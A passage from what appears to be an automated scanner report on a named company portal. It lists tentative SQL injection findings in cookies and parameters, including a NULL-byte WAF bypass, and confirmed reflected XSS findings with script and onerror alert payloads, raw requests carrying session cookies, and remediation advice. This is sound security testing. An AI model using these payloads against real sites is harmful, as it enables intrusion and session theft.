POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html' ; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html'' ; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.17. http://eden.endeca.com/c/portal/render_portlet [k_visit cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The k_visit cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the k_visit cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the k_visit cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1%2527 ; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1%2527%2527 ; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.18. http://eden.endeca.com/c/portal/render_portlet [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome&1' =1
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome&1'' =1
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.19. http://eden.endeca.com/c/portal/render_portlet [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]... _col_count%3D2%26_58_struts_action%3D%252Flogin%252Fview%26_58_cmd%3Dupdate&_58_cmd=update&_58_login=xss&_58_rememberMe=false&_58_password=xs&_58_struts_action=%2Flogin%2Fview&1%00' =1
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]... _col_count%3D2%26_58_struts_action%3D%252Flogin%252Fview%26_58_cmd%3Dupdate&_58_cmd=update&_58_login=xss&_58_rememberMe=false&_58_password=xs&_58_struts_action=%2Flogin%2Fview&1%00'' =1
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.20. http://eden.endeca.com/c/portal/render_portlet [p_l_id parameter]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The p_l_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the p_l_id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com' &p_p_id=58&p_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnormal%26p_p_mode...[SNIP]...
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com'' &p_p_id=58&p_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnormal%26p_p_mode...[SNIP]...
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
2. Cross-site scripting (reflected)
previous
next
There are 13 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
2.1. http://eden.endeca.com/c/portal/render_portlet [_58_login parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The value of the _58_login request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a8ce"><img%20src%3da%20onerror%3dalert(1)>aa69963e3ae32f989 was submitted in the _58_login parameter. This input was echoed as 6a8ce"><img src=a onerror=alert(1)>aa69963e3ae32f989 in the application's response.
Request
GET /c/portal/render_portlet?p_l_id=14820&p_p_id=58&p_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnormal%26p_p_mode%3Dview%26p_p_col_id%3Dcolumn-2%26p_p_col_count%3D2%26_58_struts_action%3D%252Flogin%252Fview%26_58_cmd%3Dupdate&_58_cmd=update&_58_login=xss6a8ce"><img%20src%3da%20onerror%3dalert(1)>aa69963e3ae32f989 &_58_rememberMe=false&_58_password=xs&_58_struts_action=%2Flogin%2Fview HTTP/1.1/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com
Response
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... 6a8ce"><img src=a onerror=alert(1)>aa69963e3ae32f989 ">...[SNIP]...
2.2. http://eden.endeca.com/dwr/interface/ECU.js [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/dwr/interface/ECU.js
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5bbb7<script>alert(1)</script>3d17fc25042 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
Request
GET /dwr/interface/ECU.js5bbb7<script>alert(1)</script>3d17fc25042 ?v=beta.2 HTTP/1.1/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Response
HTTP/1.1 501 Not Implemented-5.5-8859-15bbb7<script>alert(1)</script>3d17fc25042
2.3. http://eden.endeca.com/dwr/interface/EdenDWRUtils.js [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/dwr/interface/EdenDWRUtils.js
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 94a1a<script>alert(1)</script>9001eb28cc3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
Request
GET /dwr/interface/EdenDWRUtils.js94a1a<script>alert(1)</script>9001eb28cc3 ?v=beta.2 HTTP/1.1/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Response
HTTP/1.1 501 Not Implemented-5.5-8859-194a1a<script>alert(1)</script>9001eb28cc3
2.4. http://eden.endeca.com/web/guest/home [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/web/guest/home
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cdbe"%3balert(1)//3996ef8aaaf382f23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7cdbe";alert(1)//3996ef8aaaf382f23 in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update&_58_rememberMe=false&_58_login=xss&_58_password=xs&7cdbe"%3balert(1)//3996ef8aaaf382f23 =1 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.4.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr"><head><title>endeca.com - Welcome</title><script type='text...[SNIP]... _rememberMe%3Dfalse%26_58_login%3Dxss%26_58_password%3Dxs%267cdbe%22%253balert%281%29%2F%2F3996ef8aaaf382f23%3D1&_58_cmd=update&_58_login=xss&_58_rememberMe=false&_58_password=xs&7cdbe";alert(1)//3996ef8aaaf382f23 =1&_58_struts_action=%2Flogin%2Fview", _$J("#p_load_58_")[0]);}_$J(window).load(function () {addPortletHTML("/c/portal/render_portlet?p_l_id=14820&p_p_id=58&p_p_action=0&p_p_state=normal&p_p_mode=vi...[SNIP]...
2.5. http://eden.endeca.com/web/guest/home [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/web/guest/home
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4bd3"%3balert(1)//56bf7725d42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4bd3";alert(1)//56bf7725d42 in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update&b4bd3"%3balert(1)//56bf7725d42 =1 HTTP/1.1/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.4.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr"><head><title>endeca.com - Welcome</title><script type='text...[SNIP]... %3Dview%26p_p_col_id%3Dcolumn-2%26p_p_col_count%3D2%26_58_struts_action%3D%252Flogin%252Fview%26_58_cmd%3Dupdate%26b4bd3%22%253balert%281%29%2F%2F56bf7725d42%3D1&_58_cmd=update&b4bd3";alert(1)//56bf7725d42 =1&_58_struts_action=%2Flogin%2Fview", _$J("#p_load_58_")[0]);}_$J(window).load(function () {addPortletHTML("/c/portal/render_portlet?p_l_id=14820&p_p_id=58&p_p_action=0&p_p_state=normal&p_p_mode=vi...[SNIP]...
2.6. http://eden.endeca.com/web/guest/home [p_p_mode parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/web/guest/home
Issue detail
The value of the p_p_mode request parameter is copied into the HTML document as plain text between tags. The payload c579c<script>alert(1)</script>b9fd56e945f was submitted in the p_p_mode parameter. This input was echoed unmodified in the application's response.
Request
GET /web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=viewc579c<script>alert(1)</script>b9fd56e945f &p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update HTTP/1.1/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.4.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com; COOKIE_SUPPORT=true
Response
HTTP/1.1 500 Internal Server Error-5.5...[SNIP]... c579c<script>alert(1)</script>b9fd56e945f <br />...[SNIP]...
2.7. http://eden.endeca.com/web/guest/home [p_p_mode parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/web/guest/home
Issue detail
The value of the p_p_mode request parameter is copied into the HTML document as plain text between tags. The payload 70829<script>alert(1)</script>6bee4a3da18870390 was submitted in the p_p_mode parameter. This input was echoed unmodified in the application's response.
Request
